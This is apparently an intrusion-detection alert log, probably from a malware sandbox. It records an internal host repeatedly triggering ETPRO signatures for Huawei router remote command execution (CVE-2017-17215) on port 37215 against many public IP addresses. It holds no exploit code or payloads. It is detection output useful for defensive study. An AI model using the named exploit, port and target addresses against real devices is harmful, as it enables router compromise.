                                                        06/13/24-21:31:57.129929TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4665237215192.168.2.14197.92.27.0
                                                        06/13/24-21:32:52.655898TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4259637215192.168.2.1441.222.28.246
                                                        06/13/24-21:32:23.945699TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5856437215192.168.2.14197.130.199.102
                                                        06/13/24-21:32:17.696834TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3710837215192.168.2.14197.87.130.132
                                                        06/13/24-21:32:23.929186TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4258237215192.168.2.14197.213.198.162
                                                        06/13/24-21:32:07.420035TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4751037215192.168.2.1441.134.6.23
                                                        06/13/24-21:32:17.695550TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4620037215192.168.2.1441.145.222.44
                                                        06/13/24-21:32:25.991652TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5360637215192.168.2.1441.245.227.225
                                                        06/13/24-21:32:30.099639TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4889437215192.168.2.14197.37.100.138
                                                        06/13/24-21:32:30.078824TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5553437215192.168.2.1441.175.207.61
                                                        06/13/24-21:32:15.610768TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4062437215192.168.2.14197.142.246.213
                                                        06/13/24-21:32:32.165840TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3766437215192.168.2.1441.214.184.230
                                                        06/13/24-21:33:00.872038TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6082037215192.168.2.14197.149.27.8
                                                        06/13/24-21:32:23.833753TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3395437215192.168.2.1441.3.5.34
                                                        06/13/24-21:33:11.159295TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5292437215192.168.2.1441.167.210.163
                                                        06/13/24-21:31:57.090839TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5217437215192.168.2.14156.109.0.55
                                                        06/13/24-21:32:30.079746TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4240637215192.168.2.14197.200.57.184
                                                        06/13/24-21:33:00.868044TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3586437215192.168.2.14197.184.5.147
                                                        06/13/24-21:33:09.129442TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5536437215192.168.2.14156.142.76.235
                                                        06/13/24-21:32:28.045562TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5148837215192.168.2.1441.118.166.105
                                                        06/13/24-21:32:52.680059TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5390037215192.168.2.14197.80.244.2
                                                        06/13/24-21:32:25.978730TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5023037215192.168.2.14197.114.88.46
                                                        06/13/24-21:32:03.277333TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5318637215192.168.2.14156.135.255.113
                                                        06/13/24-21:33:04.991862TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3580237215192.168.2.1441.155.33.231
                                                        06/13/24-21:32:50.630718TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3542437215192.168.2.14156.172.139.182
                                                        06/13/24-21:33:09.086969TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4566837215192.168.2.14197.98.77.59
                                                        06/13/24-21:32:11.488432TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3763437215192.168.2.14156.187.31.37
                                                        06/13/24-21:32:42.418084TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3790437215192.168.2.1441.255.109.116
                                                        06/13/24-21:32:09.439456TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5276437215192.168.2.14197.217.51.179
                                                        06/13/24-21:33:09.090919TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5095037215192.168.2.14156.19.170.124
                                                        06/13/24-21:32:17.695061TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4260437215192.168.2.14197.72.199.240
                                                        06/13/24-21:32:25.974860TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4287037215192.168.2.14156.254.94.57
                                                        06/13/24-21:33:09.128231TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3960237215192.168.2.14156.53.113.166
                                                        06/13/24-21:33:11.176668TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4257637215192.168.2.1441.194.72.41
                                                        06/13/24-21:32:09.458509TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5913237215192.168.2.1441.84.165.251
                                                        06/13/24-21:31:59.176842TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3838437215192.168.2.14197.198.78.95
                                                        06/13/24-21:33:00.867032TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4361037215192.168.2.14156.157.192.134
                                                        06/13/24-21:32:32.170746TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3289637215192.168.2.14156.213.27.58
                                                        06/13/24-21:32:40.359079TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4859037215192.168.2.14156.68.150.99
                                                        06/13/24-21:32:30.075114TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5840437215192.168.2.14197.5.25.171
                                                        06/13/24-21:33:17.307683TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3919837215192.168.2.14156.141.229.201
                                                        06/13/24-21:33:13.210776TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5632837215192.168.2.14156.53.62.148
                                                        06/13/24-21:32:11.487399TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4082837215192.168.2.14156.232.31.53
                                                        06/13/24-21:32:30.091969TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4715237215192.168.2.14156.206.33.75
                                                        06/13/24-21:33:11.174048TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4956237215192.168.2.14156.210.203.18
                                                        06/13/24-21:32:11.508214TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4829437215192.168.2.1441.158.216.196
                                                        06/13/24-21:32:23.933012TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5937037215192.168.2.14156.175.17.216
                                                        06/13/24-21:32:40.356208TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4202037215192.168.2.14197.46.60.187
                                                        06/13/24-21:32:48.550169TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3407237215192.168.2.1441.222.160.55
                                                        06/13/24-21:32:11.509522TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5412837215192.168.2.14197.215.115.48
                                                        06/13/24-21:32:42.405150TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6013637215192.168.2.14197.21.49.81
                                                        06/13/24-21:33:09.091236TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5593037215192.168.2.14197.113.127.52
                                                        06/13/24-21:32:05.370201TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5131437215192.168.2.1441.35.18.226
                                                        06/13/24-21:32:56.756663TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3808437215192.168.2.14156.176.200.65
                                                        06/13/24-21:32:40.359254TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4084637215192.168.2.14197.201.22.33
                                                        06/13/24-21:32:50.628959TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3901637215192.168.2.1441.72.56.116
                                                        06/13/24-21:32:09.439365TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3960437215192.168.2.14156.5.36.56
                                                        06/13/24-21:32:32.152697TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4391637215192.168.2.14156.216.168.19
                                                        06/13/24-21:32:54.707173TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5704037215192.168.2.14197.52.47.103
                                                        06/13/24-21:33:05.012792TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3947037215192.168.2.14197.39.158.2
                                                        06/13/24-21:32:13.546356TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3956037215192.168.2.1441.74.109.71
                                                        06/13/24-21:31:59.175137TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4966837215192.168.2.1441.185.24.48
                                                        06/13/24-21:31:57.133999TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4299837215192.168.2.1441.32.134.206
                                                        06/13/24-21:31:57.093976TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3330437215192.168.2.14156.33.213.35
                                                        06/13/24-21:32:50.614938TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5621037215192.168.2.14197.109.107.22
                                                        06/13/24-21:32:05.371308TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5793837215192.168.2.14156.75.131.59
                                                        06/13/24-21:32:13.544958TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3747237215192.168.2.14156.227.178.210
                                                        06/13/24-21:32:32.165717TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5437037215192.168.2.14156.17.243.168
                                                        06/13/24-21:32:23.833504TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5456437215192.168.2.1441.242.63.79
                                                        06/13/24-21:32:34.194283TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5032237215192.168.2.1441.56.20.104
                                                        06/13/24-21:32:54.725272TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4440637215192.168.2.14156.212.153.32
                                                        06/13/24-21:33:02.910306TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3808237215192.168.2.1441.164.123.163
                                                        06/13/24-21:33:11.175608TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5202837215192.168.2.14197.121.17.7
                                                        06/13/24-21:32:25.992549TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5398037215192.168.2.14197.76.210.140
                                                        06/13/24-21:31:59.175345TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5734237215192.168.2.14156.43.161.30
                                                        06/13/24-21:32:15.638269TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5431837215192.168.2.1441.187.54.53
                                                        06/13/24-21:32:48.550943TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5298437215192.168.2.14156.239.54.92
                                                        06/13/24-21:32:48.556321TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5875637215192.168.2.14197.77.101.54
                                                        06/13/24-21:33:09.110789TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5038437215192.168.2.1441.241.209.175
                                                        06/13/24-21:32:42.422916TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5619037215192.168.2.14156.69.187.57
                                                        06/13/24-21:33:09.087876TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5825637215192.168.2.14156.206.79.6
                                                        06/13/24-21:32:21.781977TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4535237215192.168.2.14197.208.206.23
                                                        06/13/24-21:32:48.553379TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5974837215192.168.2.14156.130.85.172
                                                        06/13/24-21:32:36.244567TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3431637215192.168.2.14197.235.225.58
                                                        06/13/24-21:32:34.192914TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3953637215192.168.2.14156.45.91.216
                                                        06/13/24-21:32:15.606636TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4720837215192.168.2.1441.51.194.170
                                                        06/13/24-21:32:42.407303TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5962037215192.168.2.14156.63.83.96
                                                        06/13/24-21:32:25.991948TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3493837215192.168.2.14156.197.234.48
                                                        06/13/24-21:32:58.820695TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3345237215192.168.2.14156.118.84.126
                                                        06/13/24-21:33:02.936429TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3425637215192.168.2.1441.165.29.207
                                                        06/13/24-21:32:13.544420TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4222437215192.168.2.14197.142.49.241
                                                        06/13/24-21:32:17.671251TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5895837215192.168.2.1441.195.208.167
                                                        06/13/24-21:32:15.610618TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5622037215192.168.2.1441.217.155.56
                                                        06/13/24-21:32:30.095545TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4571437215192.168.2.14156.249.232.40
                                                        06/13/24-21:32:11.485195TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5619237215192.168.2.14156.107.25.200
                                                        06/13/24-21:31:57.094092TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3858237215192.168.2.1441.167.21.178
                                                        06/13/24-21:32:01.221328TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3962237215192.168.2.14156.248.189.91
                                                        06/13/24-21:32:07.404294TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5326437215192.168.2.1441.241.52.3
                                                        06/13/24-21:33:02.913576TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3559637215192.168.2.1441.112.162.182
                                                        06/13/24-21:33:15.269095TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3393837215192.168.2.1441.32.246.245
                                                        06/13/24-21:32:05.348353TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4109437215192.168.2.1441.250.161.252
                                                        06/13/24-21:32:23.941392TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4217437215192.168.2.1441.86.79.234
                                                        06/13/24-21:32:38.299168TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5870037215192.168.2.14156.84.101.173
                                                        06/13/24-21:33:15.252880TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3688037215192.168.2.14156.103.122.98
                                                        06/13/24-21:32:03.275874TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5953437215192.168.2.1441.226.180.166
                                                        06/13/24-21:32:15.605962TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4207037215192.168.2.14156.152.118.37
                                                        06/13/24-21:32:42.418149TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4103637215192.168.2.14156.218.129.29
                                                        06/13/24-21:32:19.727971TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4285037215192.168.2.14197.212.31.255
                                                        06/13/24-21:33:17.339640TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4094637215192.168.2.1441.110.152.103
                                                        06/13/24-21:32:11.505366TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5740837215192.168.2.14156.142.198.164
                                                        06/13/24-21:32:11.507688TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4506437215192.168.2.1441.226.153.192
                                                        06/13/24-21:33:13.214469TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4735037215192.168.2.14156.156.56.86
                                                        06/13/24-21:32:11.509979TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4261637215192.168.2.14156.229.210.10
                                                        06/13/24-21:32:28.027594TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4703437215192.168.2.14156.0.168.109
                                                        06/13/24-21:32:46.504214TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5722437215192.168.2.14197.35.166.113
                                                        06/13/24-21:33:07.041655TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5121037215192.168.2.14156.20.59.221
                                                        06/13/24-21:32:32.155229TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6038037215192.168.2.14156.71.77.203
                                                        06/13/24-21:32:54.710760TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4008437215192.168.2.1441.18.252.246
                                                        06/13/24-21:32:52.656650TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4606837215192.168.2.14156.179.189.5
                                                        06/13/24-21:32:48.552256TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3979037215192.168.2.14156.166.113.70
                                                        06/13/24-21:33:02.936631TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4745237215192.168.2.1441.129.245.166
                                                        06/13/24-21:33:11.160705TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5423237215192.168.2.1441.240.127.52
                                                        06/13/24-21:32:15.607571TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4828637215192.168.2.1441.127.190.17
                                                        06/13/24-21:31:57.093787TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4175637215192.168.2.1441.215.251.115
                                                        06/13/24-21:32:46.528245TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5230437215192.168.2.14197.43.81.179
                                                        06/13/24-21:33:00.871835TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5703037215192.168.2.14156.60.52.176
                                                        06/13/24-21:33:07.042067TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5231037215192.168.2.14156.233.67.123
                                                        06/13/24-21:32:38.316572TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4940837215192.168.2.14197.147.215.140
                                                        06/13/24-21:32:03.295028TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4770837215192.168.2.14156.199.108.201
                                                        06/13/24-21:32:48.555014TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3629437215192.168.2.1441.70.231.23
                                                        06/13/24-21:33:17.308873TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3777437215192.168.2.1441.206.160.166
                                                        06/13/24-21:33:07.042441TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3335037215192.168.2.14197.99.44.142
                                                        06/13/24-21:32:34.213704TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5246437215192.168.2.1441.245.242.138
                                                        06/13/24-21:32:23.835632TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3317037215192.168.2.14197.182.103.11
                                                        06/13/24-21:32:40.356123TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3785637215192.168.2.14156.218.190.95
                                                        06/13/24-21:33:15.270691TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5881637215192.168.2.1441.198.92.229
                                                        06/13/24-21:32:56.785128TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4140637215192.168.2.14156.118.172.157
                                                        06/13/24-21:32:52.669770TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4803237215192.168.2.14156.48.215.97
                                                        06/13/24-21:32:19.729323TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4219837215192.168.2.14197.213.243.59
                                                        06/13/24-21:32:52.656806TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3585837215192.168.2.14156.143.255.104
                                                        06/13/24-21:32:44.455133TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4561437215192.168.2.14197.127.236.234
                                                        06/13/24-21:33:13.212245TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4995637215192.168.2.14156.88.180.153
                                                        06/13/24-21:32:50.613828TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5800237215192.168.2.14156.46.29.23
                                                        06/13/24-21:31:57.090544TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5661237215192.168.2.14197.33.124.181
                                                        06/13/24-21:32:09.436801TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4415037215192.168.2.1441.135.203.170
                                                        06/13/24-21:32:48.573054TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4742237215192.168.2.14197.114.160.102
                                                        06/13/24-21:32:44.451450TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5585837215192.168.2.14197.6.224.46
                                                        06/13/24-21:32:01.220987TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5853037215192.168.2.1441.236.151.82
                                                        06/13/24-21:32:52.670336TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3956237215192.168.2.1441.115.70.43
                                                        06/13/24-21:32:09.457630TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3329037215192.168.2.1441.123.225.152
                                                        06/13/24-21:32:30.077737TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4856837215192.168.2.1441.243.107.106
                                                        06/13/24-21:32:36.241743TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5719637215192.168.2.14156.252.221.118
                                                        06/13/24-21:31:59.174606TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3604837215192.168.2.14156.126.25.234
                                                        06/13/24-21:32:36.246086TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4506037215192.168.2.1441.49.107.217
                                                        06/13/24-21:31:59.200056TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4077437215192.168.2.14156.14.18.99
                                                        06/13/24-21:32:48.552681TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5579237215192.168.2.14197.27.233.187
                                                        06/13/24-21:33:04.993726TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4681637215192.168.2.14197.49.192.136
                                                        06/13/24-21:33:07.043074TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5844437215192.168.2.1441.231.219.103
                                                        06/13/24-21:32:54.707879TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5055837215192.168.2.14197.232.179.160
                                                        06/13/24-21:33:15.253652TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3479237215192.168.2.1441.13.53.51
                                                        06/13/24-21:32:13.565335TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4914237215192.168.2.14197.96.95.21
                                                        06/13/24-21:32:46.524810TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4042237215192.168.2.1441.155.118.231
                                                        06/13/24-21:33:11.159923TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3798237215192.168.2.1441.134.106.223
                                                        06/13/24-21:32:30.127272TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3821237215192.168.2.14156.184.181.237
                                                        06/13/24-21:32:44.479965TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5321837215192.168.2.14197.32.148.200
                                                        06/13/24-21:32:07.402208TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4619037215192.168.2.1441.30.105.73
                                                        06/13/24-21:33:07.042422TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4721837215192.168.2.14197.6.37.108
                                                        06/13/24-21:32:07.415987TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3352437215192.168.2.14197.211.53.92
                                                        06/13/24-21:32:19.728502TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3491037215192.168.2.1441.198.119.150
                                                        06/13/24-21:32:50.631305TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5792837215192.168.2.14156.129.103.165
                                                        06/13/24-21:31:59.176315TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3938237215192.168.2.14197.254.81.101
                                                        06/13/24-21:32:40.376911TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4639037215192.168.2.14197.4.141.205
                                                        06/13/24-21:32:05.378269TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6050237215192.168.2.14156.46.5.55
                                                        06/13/24-21:32:17.676637TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5505037215192.168.2.14156.35.170.68
                                                        06/13/24-21:32:40.374931TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5375237215192.168.2.14156.69.150.234
                                                        06/13/24-21:32:32.150371TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4710037215192.168.2.1441.159.227.229
                                                        06/13/24-21:33:13.213129TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4083437215192.168.2.1441.204.228.64
                                                        06/13/24-21:32:58.824012TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5191437215192.168.2.14156.233.68.20
                                                        06/13/24-21:32:58.824451TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5725637215192.168.2.14197.69.14.34
                                                        06/13/24-21:32:17.695425TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4165837215192.168.2.14197.216.144.24
                                                        06/13/24-21:32:30.124854TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3751837215192.168.2.14197.63.222.134
                                                        06/13/24-21:32:21.800741TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3597237215192.168.2.14156.245.213.140
                                                        06/13/24-21:32:34.199561TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5013837215192.168.2.1441.68.81.200
                                                        06/13/24-21:32:09.440087TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3965437215192.168.2.1441.29.176.191
                                                        06/13/24-21:32:58.823665TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3743437215192.168.2.14156.47.78.39
